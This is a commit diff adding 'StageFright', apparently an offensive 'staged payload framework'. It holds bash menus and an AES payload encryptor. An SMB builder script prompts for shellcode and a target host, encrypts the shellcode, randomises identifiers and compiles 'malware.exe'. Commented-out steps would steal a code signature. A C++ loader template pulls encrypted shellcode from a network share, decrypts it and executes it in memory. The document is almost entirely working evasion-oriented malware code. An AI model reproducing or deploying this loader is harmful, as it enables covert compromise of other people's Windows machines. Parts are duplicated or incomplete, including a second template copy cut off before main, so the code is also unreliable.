Add files via upload

Initial commit.

StageFright/StageFright/EXE.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+          **by assume-breach**
+
+       A staged payload framework. "
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encrypted SMB Stager"
+echo -e "$BOLD_BLUE 2.$BOLD_WHITE AES Encrypted TCP Stager"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash StageFright/SMB/SMB.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash StageFright/TCP/TCP.sh
+
+else 
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

StageFright/StageFright/StageFright.sh

@@ -0,0 +1,76 @@
+#!/bin/bash
+
+NO_COLOR="\e[0m"
+WHITE="\e[0;17m"
+BOLD_WHITE="\e[1;37m"
+BLACK="\e[0;30m"
+BLUE="\e[0;34m"
+BOLD_BLUE="\e[1;34m"
+GREEN="\e[0;32m"
+BOLD_GREEN="\e[1;32m"
+CYAN="\e[0;36m"
+BOLD_CYAN="\e[1;36m"
+RED="\e[0;31m"
+BOLD_RED="\e[1;31m"
+PURPLE="\e[0;35m"
+BOLD_PURPLE="\e[1;35m"
+BROWN="\e[0;33m"
+BOLD_YELLOW="\e[1;33m"
+GRAY="\e[0;37m"
+BOLD_GRAY="\e[1;30m"
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+
+function easyexit()
+{
+	clear
+	exit
+}
+
+function title() {
+echo -e "$BOLD_GREEN
+
+ _____ _                    ______    _       _     _   
+/  ___|| |                  |  ___|  (_)     | |   | |  
+\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
+ --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
+/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
+\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
+                 __/ |                   __/ |          
+                |___/                   |___/           
+
+                **by assume-breach**
+
+             A staged payload framework." 
+}
+
+title
+echo -e $BOLD_CYAN
+echo "Choose an option:"
+echo ""
+echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create Staged EXE"
+#echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create FUD DLL"
+echo ""
+echo -n -e "$BOLD_WHITE > "
+read CHOICE
+clear
+
+if [ $CHOICE == 1 ]; then
+	echo ""
+	bash EXE.sh
+
+elif [ $CHOICE == 2 ]; then
+	echo ""
+	bash DLL.sh
+
+else
+	echo -e $BOLD_RED Invalid option
+	sleep 3
+	trap easyexit EXIT
+fi

StageFright/StageFright/StageFright/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMB/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL oChGWKarQjmd(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL VIJanVqcg(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int deTOQBVTuK(char* Random4, unsigned int LrJUg, char* ycwrsVM, size_t ycwrsVMlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)ycwrsVM, (DWORD)ycwrsVMlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &LrJUg)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char nzjimSxfJSWR[] =  { 0x73, 0x29, 0x6a, 0x97, 0xdb, 0x93, 0xc6, 0x4d, 0x6a, 0x5f, 0x6c, 0x42, 0xe2, 0xf2, 0xf9, 0x7a };
+
+int main() {
+    LPCWSTR szServer = L"Win11Blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE GHqjoSGLKLzfx;
+    SIZE_T GHqjoSGLKLzfxSize;
+
+    BOOL success = oChGWKarQjmd(szServer, szFilePath, &GHqjoSGLKLzfx, &GHqjoSGLKLzfxSize);
+
+    if (success) {
+        deTOQBVTuK((char*)GHqjoSGLKLzfx, GHqjoSGLKLzfxSize, nzjimSxfJSWR, sizeof(nzjimSxfJSWR));
+
+        success = VIJanVqcg(GHqjoSGLKLzfx, GHqjoSGLKLzfxSize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = GHqjoSGLKLzfxSize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&GHqjoSGLKLzfx,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(GHqjoSGLKLzfx);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/SMB/SMB.sh

@@ -0,0 +1,189 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+
+  ___   _____ _____   _____                            _           _ 
+ / _ \ |  ___/  ___| |  ___|                          | |         | |
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
+                                            __/ | |                  
+                                           |___/|_|                  
+ _____ _                       _   ________  _________               
+/  ___| |                     | | /  ___|  \/  || ___ \              
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ /              
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \              
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ /              
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/               
+                 __/ |                                               
+                |___/                                                
+ _____                    _   _                                      
+|  ___|                  | | (_)                                     
+| |____  _____  ___ _   _| |_ _  ___  _ __                           
+|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
+| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
+\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                                             
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMB/template.cpp StageFright/SMB/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMB/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMB/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMB/conv.py StageFright/SMB/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMB/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMB/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMB/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMB/Resources/con.py
+python3 StageFright/SMB/Resources/con.py
+#rm StageFright/SMB/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMB/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMB/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMB/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMB/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMB/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMB/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMB/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMB/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMB/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMB/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMB/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMB/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMB/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/SMB/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/SMB/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/SMB/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/SMB/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/SMB/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+#echo ""
+#sleep 2
+#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/SMB/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+#mv signed$MALWARE $MALWARE
+#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+#echo ""
+
+

StageFright/StageFright/StageFright/SMB/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

StageFright/StageFright/StageFright/SMB/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL Random1(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL Random2(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
